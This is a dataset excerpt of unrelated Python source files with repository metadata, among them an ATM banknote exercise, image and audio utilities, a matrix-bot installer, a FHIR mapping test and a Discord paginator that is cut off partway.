| 29.943396 | 75 | 0.594833 | 205 | 1,587 | 4.443902 | 0.414634 | 0.111965 | 0.060373 | 0.04281 | 0.172338 | 0.121844 | 0.052689 | 0 | 0 | 0 | 0 | 0.007732 | 0.266541 | 1,587 | 52 | 76 | 30.519231 | 0.774914 | 0.062382 | 0 | 0.173913 | 0 | 0 | 0.118323 | 0.035835 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.021739 | 0.086957 | 0 | 0.173913 | 0.065217 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c08f460382ec3b33cf7123a486c0813f01ab8bf | 1,531 | py | Python | ex071 - Caixa eletronico.py | xing-wang-kai/Exercicios_curso_video_Gustavo_guanabara | c28fb114dc71ef7e4b1684d78a5140fa8dc982a3 | [
"MIT"
] | null | null | null | ex071 - Caixa eletronico.py | xing-wang-kai/Exercicios_curso_video_Gustavo_guanabara | c28fb114dc71ef7e4b1684d78a5140fa8dc982a3 | [
"MIT"
] | null | null | null | ex071 - Caixa eletronico.py | xing-wang-kai/Exercicios_curso_video_Gustavo_guanabara | c28fb114dc71ef7e4b1684d78a5140fa8dc982a3 | [
"MIT"
] | null | null | null | """Exercício Python 071: Crie um programa que simule o funcionamento de um caixa eletrônico.
No início, pergunte ao usuário qual será o valor a ser sacado (número inteiro) e o programa
vai informar quantas cédulas de cada valor serão entregues. OBS:
considere que o caixa possui cédulas de R$50, R$20, R$10 e R$1."""
print("="*40)
print("{:-^50}".format("\033[1:35m BEM VINDO AO CAIXA ELETRÔNICO\033[m"))
print("{:-^50}".format("\033[1:31m ATENÇÃO ESTE CAIXA SÓ TEM CEDULAS \033[m"))
print("{:-^50}".format("\033[1:31m DE R$50 R$20 R$10 e R$1 \033[m"))
print("="*40)
saque = int(input("Quanto você deseja sacar?"))
celula50 = 50
celula20 = 20
celula10 = 10
celula1 = 1
total50 = total20 = total10 = total1 = 0
while True:
if saque >= celula50:
total50 = int(saque/celula50)
saque = saque % celula50
elif saque >= celula20 and saque <= celula50:
total20 = int(saque/celula20)
saque = saque%celula20
elif saque >= celula10 and saque <=celula20:
total10 = int(saque/celula10)
saque = saque%celula10
elif saque >= celula1 and saque <= celula10:
total1 = int(saque/celula1)
saque = saque % celula1
elif saque == 0:
break
if total50 != 0:
print(f"você vai sacar o total de {total50} notas de R$50")
if total20 != 0:
print(f"você vai sacar o total de {total20} notas de R$20")
if total10 != 0:
print(f"você vai sacar o total de {total10} notas de R$10")
if total1 != 0:
print(f"você vai sacar o totla de {total1} notas de R$1")
| 37.341463 | 92 | 0.655781 | 245 | 1,531 | 4.097959 | 0.334694 | 0.017928 | 0.027888 | 0.043825 | 0.193227 | 0.176295 | 0.176295 | 0.156375 | 0.108566 | 0.027888 | 0 | 0.113428 | 0.216852 | 1,531 | 40 | 93 | 38.275 | 0.723937 | 0.202482 | 0 | 0.058824 | 0 | 0.029412 | 0.312757 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.264706 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c0f5733a076ef40dbdc3402e87c709d21fb58ec | 1,416 | py | Python | CODE/grupo08.py | macanepa/logistics-solver | 71b239f164a8e3d543c023579cf6ef4b84c201fa | [
"MIT"
] | null | null | null | CODE/grupo08.py | macanepa/logistics-solver | 71b239f164a8e3d543c023579cf6ef4b84c201fa | [
"MIT"
] | null | null | null | CODE/grupo08.py | macanepa/logistics-solver | 71b239f164a8e3d543c023579cf6ef4b84c201fa | [
"MIT"
] | null | null | null | import utilities
from mcutils import menu_manager as mc
mc.ColorSettings.print_color = True
mc.ColorSettings.is_dev = True
mc.LogSettings.display_logs = True
utilities.initialize()
about = mc.Credits(authors=["Matías Cánepa",
"Javiera Araya",
"Ignacio Chocair",
"Florencia Peralta",
"Isidora Ramirez"],
team_name="Team 8",
github_account="macanepa",
email_address="macanepa@miuandes.cl",
company_name="TDB")
mf_exit_application = mc.MenuFunction(title="Exit", function=mc.exit_application)
mf_import_input_data = mc.MenuFunction("Change Input Data Folder", utilities.import_input_data, *[True])
mf_optimize = mc.MenuFunction(title="Optimize", function=utilities.optimize)
mf_about = mc.MenuFunction(title="About", function=about.print_credits)
mf_display_input_data = mc.MenuFunction(title="Display Input Data", function=utilities.print_input_data)
mf_display_parameters = mc.MenuFunction(title="Display Parameters", function=utilities.display_parameters)
mc_main_menu = mc.Menu(title="Main Menu",
options=[mf_import_input_data, mf_optimize, mf_display_input_data, mf_display_parameters,
mf_about, mf_exit_application], back=False)
while True:
mc_main_menu.show()
| 44.25 | 112 | 0.670198 | 162 | 1,416 | 5.592593 | 0.376543 | 0.07947 | 0.104857 | 0.037528 | 0.06181 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000923 | 0.234463 | 1,416 | 31 | 113 | 45.677419 | 0.834871 | 0 | 0 | 0 | 0 | 0 | 0.138418 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.153846 | 0.115385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c11c3fead810454eb8af4a88561feaeea250f02 | 2,444 | py | Python | converter/nnef_converters/setup.py | asdor/NNEF-Tools | e84c3db29c1bffbd1938d40a10765badc0848606 | [
"Apache-2.0"
] | null | null | null | converter/nnef_converters/setup.py | asdor/NNEF-Tools | e84c3db29c1bffbd1938d40a10765badc0848606 | [
"Apache-2.0"
] | null | null | null | converter/nnef_converters/setup.py | asdor/NNEF-Tools | e84c3db29c1bffbd1938d40a10765badc0848606 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2017 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division, print_function
import os
from setuptools import setup, find_packages
from version import __version__ as version
packages = find_packages(where="..", include=("nnef_converters*",))
package_dir = {package: os.path.join("..", *package.split('.')) for package in packages}
setup(name='nnef_converters',
version=version,
description='NNEF Converters',
url='https://github.com/KhronosGroup/NNEF-Tools',
author='Tamas Danyluk',
author_email='tamas.danyluk@aimotive.com',
license='Apache 2.0',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
keywords='nnef',
packages=packages,
package_dir=package_dir,
entry_points={
'console_scripts': [
'caffe_to_nnef = nnef_converters.caffe_converters.caffe_to_nnef.command:main',
'nnef_to_caffe = nnef_converters.caffe_converters.nnef_to_caffe.command:main',
'nnef_to_tf = nnef_converters.tf_converters.nnef_to_tf.command:main',
'tf_to_nnef = nnef_converters.tf_converters.tf_to_nnef.command:main',
'create_dummy_caffe_model = nnef_converters.caffe_converters.create_dummy_caffe_model:main',
'create_dummy_tf_checkpoint = nnef_converters.tf_converters.create_dummy_tf_checkpoint:main',
]
})
print()
print("Some tools need additional dependencies, that are not checked now:")
print("all tools: nnef, numpy")
print("tf_to_nnef, nnef_to_tf, create_dummy_tf_checkpoint: tensorflow")
print("caffe_to_nnef, nnef_to_caffe: caffe")
print()
print("Install successful!")
| 40.065574 | 107 | 0.705401 | 314 | 2,444 | 5.267516 | 0.44586 | 0.076179 | 0.024184 | 0.0526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006572 | 0.190671 | 2,444 | 60 | 108 | 40.733333 | 0.829626 | 0.238953 | 0 | 0.05 | 0 | 0 | 0.545504 | 0.24377 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c131afc1a8fa0db0764e5b016b146b5a0b04ed4 | 4,521 | py | Python | utils.py | hamedhaghighi/Usupervised_Image_Restoration | a3fefbf54891b9e984987fe15bd6b434b59fec3c | [
"MIT"
] | null | null | null | utils.py | hamedhaghighi/Usupervised_Image_Restoration | a3fefbf54891b9e984987fe15bd6b434b59fec3c | [
"MIT"
] | null | null | null | utils.py | hamedhaghighi/Usupervised_Image_Restoration | a3fefbf54891b9e984987fe15bd6b434b59fec3c | [
"MIT"
] | null | null | null | import os
import errno
import numpy as np
from skimage import io
import scipy
import scipy.misc
from skimage.transform import resize
from skimage.measure import compare_psnr , compare_ssim
import matplotlib.pyplot as plt
plt.switch_backend('agg')
import matplotlib
import utils_mnist as utils
import pdb
def normalize(images):
M = np.max(images,(1,2,3))
m = np.min(images, (1,2,3))
Mm = np.array([val*np.ones_like(images[0]) for val in M ])
mm = np.array([val*np.ones_like(images[0]) for val in m ])
return ((images - mm)/(Mm - mm)) * 2.0 - 1.0
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def load_celebA(data , n):
dt = data.test_data_list[:n]
images = np.array([get_image(ls,108, is_crop=True, resize_w=64,is_grayscale=False) for ls in dt])
return images
def get_image(image_path, image_size, is_crop=True, resize_w=64, is_grayscale=False):
return transform(imread(image_path, is_grayscale), image_size, is_crop, resize_w)
def transform(image, npx=64, is_crop=False, resize_w=64):
# npx : # of pixels width/height of image
if is_crop:
cropped_image = center_crop(image, npx, resize_w=resize_w)
else:
cropped_image = image
cropped_image = resize(cropped_image,
[resize_w, resize_w])
return np.array(cropped_image) / 127.5 - 1
def center_crop(x, crop_h , crop_w=None, resize_w=64):
if crop_w is None:
crop_w = crop_h
h, w = x.shape[:2]
j = int(round((h - crop_h)/2.))
i = int(round((w - crop_w)/2.))
return resize(x[j:j+crop_h, i:i+crop_w],
[resize_w, resize_w])
def compute_pnsr_ssim(x , y):
return compare_psnr(x, y), compare_ssim(x, y, multichannel=True)
def save_images(images, size, image_path, measure_dict, titles, x_range):
images = [merge(img , size, x_range) for img in images]
PSNR, SSIM = compute_pnsr_ssim(images[0], images[2])
measure_dict['psnr'].append(PSNR)
measure_dict['ssim'].append(SSIM)
return imsave(images, size, image_path,measure_dict, titles)
def imread(path, is_grayscale=False):
if (is_grayscale):
return io.imread(path.decode('utf-8'), flatten=True).astype(np.float)
else:
return io.imread(path.decode('utf-8')).astype(np.float)
def imsave(images, size, path, measure_dict, titles):
fig = plt.figure()
gs = matplotlib.gridspec.GridSpec(2, 4, figure = fig)
for i in range(len(images)):
f_ax = fig.add_subplot(gs[0, i])
f_ax.set_title(titles[i])
f_ax.imshow(images[i])
for ind , (k , v) in enumerate(measure_dict.items()):
f_ax = fig.add_subplot(gs[1, ind])
f_ax.set_title(k)
f_ax.plot(np.arange(len(v)) + 1 , v)
fig.savefig(path , format='png')
plt.close()
def merge(images, size, x_range):
h, w = images.shape[1], images.shape[2]
img = np.zeros((np.int64(h * size[0]), np.int64(w * size[1]), 3) , dtype = np.float32)
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j * h:j * h + h, i * w: i * w + w, :] = (image/(x_range[1] - x_range[0])) + np.abs(x_range[0])/2.0
return img
def inverse_transform(image):
return (image * 255.0).astype(np.uint8)
class CelebA(object):
def __init__(self, images_path):
self.dataname = "CelebA"
self.dims = 64 * 64
self.shape = [64, 64, 3]
self.image_size = 64
self.channel = 3
self.images_path = images_path
self.train_data_list, self.val_data_list, self.test_data_list = self.read_image_list_file(images_path)
def load_celebA(self):
# get the list of image path
return self.train_data_list
def load_test_celebA(self):
# get the list of image path
return self.val_data_list
def read_image_list_file(self, category):
lines = open(category + "list_eval_partition.txt")
train_list = []
val_list = []
test_list = []
for line in lines:
name , tag = line.split(' ')
name = category + 'celebA/' + name
if tag[0] == '0':
train_list += [name]
elif tag[0] == '1':
val_list += [name]
else:
test_list += [name]
return train_list, val_list, test_list | 32.292857 | 110 | 0.614245 | 700 | 4,521 | 3.79 | 0.242857 | 0.029024 | 0.01357 | 0.015831 | 0.16585 | 0.16585 | 0.134188 | 0.08594 | 0.08594 | 0.059555 | 0 | 0.024644 | 0.255032 | 4,521 | 140 | 111 | 32.292857 | 0.763064 | 0.023004 | 0 | 0.053097 | 0 | 0 | 0.014279 | 0.005213 | 0 | 0 | 0 | 0 | 0 | 1 | 0.141593 | false | 0.00885 | 0.106195 | 0.044248 | 0.380531 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c132089f9bf26af19d1900865d4951821d8c47f | 1,830 | py | Python | project_src/reduce.py | ncble/Speech-Recognition | a00190cb1bf6e37f883ccbbf36eb27d05ac169ca | [
"Apache-2.0"
] | 4 | 2018-02-09T07:51:19.000Z | 2020-06-16T10:16:06.000Z | project_src/reduce.py | ncble/Speech-Recognition | a00190cb1bf6e37f883ccbbf36eb27d05ac169ca | [
"Apache-2.0"
] | null | null | null | project_src/reduce.py | ncble/Speech-Recognition | a00190cb1bf6e37f883ccbbf36eb27d05ac169ca | [
"Apache-2.0"
] | null | null | null | from utile import *
import librosa
import os
import time
import numpy as np
'''
Cut silence in data -> unefficient because size_after > size_before...
'''
def reduce_audio_file(filename, new_path):
'''
Open a file, remove silence and save it to another location:
- filename: path to the file
- new_path: path to new file
'''
y, sr = librosa.load(filename, sr=22050)
y = librosa.effects.trim(y, top_db=15)[0]
librosa.output.write_wav(new_path, y, sr)
def reduce_all(folder, new_folder, max_iter = 100):
'''
Remove silence from all the file and save them to another location:
- folder: path to the folder containing the files
- new_folder: path to the new folder to save the files
- max_iter: max number of files to reduce
'''
g = generator(root_dir=folder)
new_folder_split = new_folder.split("/")
i = 0
for filename in g:
file_split = filename.split("/")
if file_split[-1][-3:] == "wav": # check that the file is a ".wav"
new_path = new_folder +"/"+ "/".join(file_split[len(new_folder_split):-1])
if not os.path.exists(new_path):
os.makedirs(new_path)
reduce_audio_file(filename, os.path.join(new_path, file_split[-1]))
i += 1
if i > max_iter:
return
if __name__ == '__main__':
print("Start test data")
if not os.path.exists('../data_reduced/train/audio'):
os.makedirs('../data_reduced/train/audio')
reduce_all('../data/train/audio/', '../data_reduced/train/audio', max_iter = np.infty)
print("Start test data")
if not os.path.exists('../data_reduced/test/audio'):
os.makedirs('../data_reduced/test/audio')
reduce_all('../data/test/audio/', '../data_reduced/test/audio', max_iter = np.infty)
| 34.528302 | 90 | 0.631694 | 267 | 1,830 | 4.142322 | 0.318352 | 0.044304 | 0.024412 | 0.029837 | 0.179928 | 0.083183 | 0.083183 | 0.083183 | 0.083183 | 0.083183 | 0 | 0.012126 | 0.23388 | 1,830 | 52 | 91 | 35.192308 | 0.776748 | 0.210929 | 0 | 0.0625 | 0 | 0 | 0.184791 | 0.120913 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.15625 | 0 | 0.25 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c141b3124b4ae6f2fe0a680e11df1f0f1a00584 | 2,742 | py | Python | modules/apps/PrefabSynapsebot.py | Jumpscale/rsal9 | e7ff7638ca53dafe872ce3030a379e8b65cb4831 | [
"Apache-2.0"
] | 1 | 2017-06-07T08:11:57.000Z | 2017-06-07T08:11:57.000Z | modules/apps/PrefabSynapsebot.py | Jumpscale/rsal9 | e7ff7638ca53dafe872ce3030a379e8b65cb4831 | [
"Apache-2.0"
] | 106 | 2017-05-10T18:16:31.000Z | 2019-09-18T15:09:07.000Z | modules/apps/PrefabSynapsebot.py | Jumpscale/rsal9 | e7ff7638ca53dafe872ce3030a379e8b65cb4831 | [
"Apache-2.0"
] | 5 | 2018-01-26T16:11:52.000Z | 2018-08-22T15:12:52.000Z | from js9 import j
app = j.tools.prefab._getBaseAppClass()
class PrefabSynapsebot(app):
NAME = "synapse-bot"
def _init(self):
self.bot_repo = "https://github.com/arahmanhamdy/Matrix-NEB.git"
self.server_path = "{{CODEDIR}}/matrixbot"
def build(self, reset=False):
if self.doneCheck('build', reset):
return
# Install prerequisite libraries
self.prefab.system.package.mdupdate()
needed_packages = ["python3-pip", "python3-setuptools"]
for package in needed_packages:
self.prefab.system.package.ensure(package)
# Clone bot server repo
self.prefab.tools.git.pullRepo(self.bot_repo, dest=self.server_path)
# Install prerequisite python libs
cmd = """
cd {server_path}
python3 setup.py install
""".format(server_path=self.server_path)
self.prefab.core.run(cmd)
self.doneSet('build')
def install(self, matrix_url, bot_user, admins=None, start=True, reset=False):
"""
Build and Install synapse matrix bot server
:param matrix_url: Synapse matrix url
:param bot_user: the full username of bot user (i.e @gigbot:matrix.aydo.com)
:param admins:list: list of full username of admins of the bot (i.e ["@root:matrix.aydo.com"])
:param start: start after install
:param reset: reset building
"""
self.build(reset=reset)
# Configure synapse bot server
self._configure(matrix_url, bot_user, admins)
if start:
self.start()
def _configure(self, matrix_url, bot_user, admins=None):
import requests
if not admins:
admins = []
# create bot user
bot = {"username": bot_user, "password": "", "auth": {"type": "m.login.dummy"}}
res = requests.post("{}/_matrix/client/r0/register".format(matrix_url), json=bot)
token = res.json()['access_token']
# configure bot server to use the bot user
config_file_path = "{}/botserver.conf".format(self.server_path)
config_data = {
"url": matrix_url,
"case_insensitive": True,
"token": token,
"admins": admins,
"user": bot_user
}
config_data = j.data.serializer.json.dumps(config_data)
self.prefab.core.file_write(config_file_path, config_data)
def start(self):
cmd = 'python3 "{}" -c "{}"'.format(self.server_path + "/neb.py", self.server_path + "/botserver.conf")
self.prefab.system.processmanager.get().ensure("matrix-bot", cmd, wait=5, expect="Running on")
def stop(self):
self.prefab.system.processmanager.get().stop("matrix-bot")
| 34.708861 | 111 | 0.615609 | 336 | 2,742 | 4.904762 | 0.357143 | 0.038228 | 0.050971 | 0.029126 | 0.089806 | 0.036408 | 0.036408 | 0 | 0 | 0 | 0 | 0.003445 | 0.258935 | 2,742 | 78 | 112 | 35.153846 | 0.807579 | 0.178337 | 0 | 0 | 0 | 0 | 0.176282 | 0.022894 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.020833 | 0.041667 | 0 | 0.229167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c1588657944b22234ccd349fa370b26fcdaee8c | 1,331 | py | Python | tests/test_fhir_to_capacity.py | FAIR-data-for-CAPACITY/CAPACITY-mapping | a1b68a228c470f20185b8be781d67fcd5579ccd7 | [
"Apache-2.0"
] | null | null | null | tests/test_fhir_to_capacity.py | FAIR-data-for-CAPACITY/CAPACITY-mapping | a1b68a228c470f20185b8be781d67fcd5579ccd7 | [
"Apache-2.0"
] | 16 | 2021-05-19T07:10:21.000Z | 2021-05-27T12:37:04.000Z | tests/test_fhir_to_capacity.py | FAIR-data-for-CAPACITY/FHIR-to-CAPACITY | a1b68a228c470f20185b8be781d67fcd5579ccd7 | [
"Apache-2.0"
] | null | null | null | from datetime import date
from fhirclient.models.encounter import Encounter
from fhirclient.models.fhirdate import FHIRDate
from fhirclient.models.patient import Patient
from fhirclient.models.period import Period
from fhirtocapacity import mapping
def test_map_patient():
patient = Patient()
patient.gender = 'male'
patient.id = '123'
patient.birthDate = FHIRDate()
patient.birthDate.date = date(1990, 1, 2)
encounter = Encounter()
encounter.period = Period()
encounter.period.start = FHIRDate()
encounter.period.start.date = date(2021, 4, 20)
encounter.period.end = FHIRDate()
encounter.period.end.date = date(2021, 5, 20)
mapped_records = mapping.map_patient(patient, encounters=[encounter])
baseline_capacity = mapped_records[0]
discharge_capacity = mapped_records[1]
assert baseline_capacity['sex'] == 1
assert baseline_capacity['subjid'] == '123'
assert baseline_capacity['age_estimateyears'] == 31
assert baseline_capacity['age_estimateyearsu'] == 2
assert baseline_capacity['admission_date'] == '2021-04-20'
assert baseline_capacity['admission_any_date'] == '2021-04-20'
assert discharge_capacity['subjid'] == '123'
assert discharge_capacity['capdis_outcomedate'] == '2021-05-20'
assert discharge_capacity['capdis_date']
| 32.463415 | 73 | 0.730278 | 158 | 1,331 | 6 | 0.310127 | 0.118143 | 0.139241 | 0.048523 | 0.037975 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052679 | 0.158527 | 1,331 | 40 | 74 | 33.275 | 0.79375 | 0 | 0 | 0 | 0 | 0 | 0.115702 | 0 | 0 | 0 | 0 | 0 | 0.3 | 1 | 0.033333 | false | 0 | 0.2 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c16b47612e50cf993e4a0d9f619541dd218324d | 18,120 | py | Python | sebimachine/shared_libs/paginator.py | dustinpianalto/Sebi-Machine | 946590a3a14461ff73fee015feb183a1d3361f14 | [
"MIT"
] | 8 | 2018-05-24T11:10:26.000Z | 2020-12-11T19:21:52.000Z | sebimachine/shared_libs/paginator.py | dustinpianalto/Sebi-Machine | 946590a3a14461ff73fee015feb183a1d3361f14 | [
"MIT"
] | 16 | 2018-05-24T01:02:26.000Z | 2018-06-21T18:43:51.000Z | sebimachine/shared_libs/paginator.py | dustinpianalto/Sebi-Machine | 946590a3a14461ff73fee015feb183a1d3361f14 | [
"MIT"
] | 15 | 2018-05-24T07:40:53.000Z | 2018-06-20T16:38:43.000Z | """
Utility for creating Paginated responses
#####################################################################################
# #
# MIT License #
# #
# Copyright (c) 2018 Dusty.P https://github.com/dustinpianalto #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
# #
#####################################################################################
"""
import asyncio
import typing
import discord
class Paginator:
def __init__(
self,
bot: discord.ext.commands.Bot,
*,
max_chars: int = 1970,
max_lines: int = 20,
prefix: str = "```md",
suffix: str = "```",
page_break: str = "\uFFF8",
field_break: str = "\uFFF7",
field_name_char: str = "\uFFF6",
inline_char: str = "\uFFF5",
max_line_length: int = 100,
embed=False,
):
_max_len = 6000 if embed else 1980
assert 0 < max_lines <= max_chars
assert 0 < max_line_length < 120
self._parts = list()
self._prefix = prefix
self._suffix = suffix
self._max_chars = (
max_chars
if max_chars + len(prefix) + len(suffix) + 2 <= _max_len
else _max_len - len(prefix) - len(suffix) - 2
)
self._max_lines = max_lines - (prefix + suffix).count("\n") + 1
self._page_break = page_break
self._max_line_length = max_line_length
self._pages = list()
self._max_field_chars = 1014
self._max_field_name = 256
self._max_description = 2048
self._embed = embed
self._field_break = field_break
self._field_name_char = field_name_char
self._inline_char = inline_char
self._embed_title = ""
self._embed_description = ""
self._embed_color = None
self._embed_thumbnail = None
self._embed_url = None
self._bot = bot
def set_embed_meta(
self,
title: str = None,
description: str = None,
color: discord.Colour = None,
thumbnail: str = None,
url: str = None,
):
if title and len(title) > self._max_field_name:
raise RuntimeError("Provided Title is too long")
else:
self._embed_title = title
if description and len(description) > self._max_description:
raise RuntimeError("Provided Description is too long")
else:
self._embed_description = description
self._embed_color = color
self._embed_thumbnail = thumbnail
self._embed_url = url
def pages(self) -> typing.List[str]:
_pages = list()
_fields = list()
_page = ""
_lines = 0
_field_name = ""
_field_value = ""
_inline = False
def open_page():
nonlocal _page, _lines, _fields
if not self._embed:
_page = self._prefix
_lines = 0
else:
_fields = list()
def close_page():
nonlocal _page, _lines, _fields
if not self._embed:
_page += self._suffix
_pages.append(_page)
else:
if _fields:
_pages.append(_fields)
open_page()
open_page()
if not self._embed:
for part in [str(p) for p in self._parts]:
if part == self._page_break:
close_page()
new_chars = len(_page) + len(part)
if new_chars > self._max_chars:
close_page()
elif (_lines + (part.count("\n") + 1 or 1)) > self._max_lines:
close_page()
_lines += part.count("\n") + 1 or 1
_page += "\n" + part
else:
def open_field(name: str):
nonlocal _field_value, _field_name
_field_name = name
_field_value = self._prefix
def close_field(next_name: str = None):
nonlocal _field_name, _field_value, _fields
_field_value += self._suffix
if _field_value != self._prefix + self._suffix:
_fields.append(
{"name": _field_name, "value": _field_value, "inline": _inline}
)
if next_name:
open_field(next_name)
open_field("\uFFF0")
for part in [str(p) for p in self._parts]:
if part == self._page_break:
close_page()
continue
elif part == self._field_break:
if len(_fields) + 1 < 25:
close_field(next_name="\uFFF0")
else:
close_field()
close_page()
continue
if part.startswith(self._field_name_char):
part = part.replace(self._field_name_char, "")
if part.startswith(self._inline_char):
_inline = True
part = part.replace(self._inline_char, "")
else:
_inline = False
if _field_value and _field_value != self._prefix:
close_field(part)
else:
_field_name = part
continue
_field_value += "\n" + part
close_field()
close_page()
self._pages = _pages
return _pages
def process_pages(self) -> typing.List[str]:
_pages = self._pages or self.pages()
_len_pages = len(_pages)
_len_page_str = len(f"{_len_pages}/{_len_pages}")
if not self._embed:
for i, page in enumerate(_pages):
if len(page) + _len_page_str <= 2000:
_pages[i] = f"{i + 1}/{_len_pages}\n{page}"
else:
for i, page in enumerate(_pages):
em = discord.Embed(
title=self._embed_title,
description=self._embed_description,
color=self._bot.embed_color,
)
if self._embed_thumbnail:
em.set_thumbnail(url=self._embed_thumbnail)
if self._embed_url:
em.url = self._embed_url
if self._embed_color:
em.colour = self._embed_color
em.set_footer(text=f"{i + 1}/{_len_pages}")
for field in page:
em.add_field(
name=field["name"], value=field["value"], inline=field["inline"]
)
_pages[i] = em
return _pages
def __len__(self):
return sum(len(p) for p in self._parts)
def __eq__(self, other):
# noinspection PyProtectedMember
return self.__class__ == other.__class__ and self._parts == other._parts
def add_page_break(self, *, to_beginning: bool = False) -> None:
self.add(self._page_break, to_beginning=to_beginning)
def add(
self,
item: typing.Any,
*,
to_beginning: bool = False,
keep_intact: bool = False,
truncate=False,
) -> None:
item = str(item)
i = 0
if not keep_intact and not item == self._page_break:
item_parts = item.strip("\n").split("\n")
for part in item_parts:
if len(part) > self._max_line_length:
if not truncate:
length = 0
out_str = ""
def close_line(line):
nonlocal i, out_str, length
self._parts.insert(
i, out_str
) if to_beginning else self._parts.append(out_str)
i += 1
out_str = line + " "
length = len(out_str)
bits = part.split(" ")
for bit in bits:
next_len = length + len(bit) + 1
if next_len <= self._max_line_length:
out_str += bit + " "
length = next_len
elif len(bit) > self._max_line_length:
if out_str:
close_line(line="")
for out_str in [
bit[i : i + self._max_line_length]
for i in range(0, len(bit), self._max_line_length)
]:
close_line("")
else:
close_line(bit)
close_line("")
else:
line = f"{part:.{self._max_line_length-3}}..."
self._parts.insert(
i, line
) if to_beginning else self._parts.append(line)
else:
self._parts.insert(i, part) if to_beginning else self._parts.append(
part
)
i += 1
elif keep_intact and not item == self._page_break:
if len(item) >= self._max_chars or item.count("\n") > self._max_lines:
raise RuntimeError(
"{item} is too long to keep on a single page and is marked to keep intact."
)
if to_beginning:
self._parts.insert(0, item)
else:
self._parts.append(item)
else:
if to_beginning:
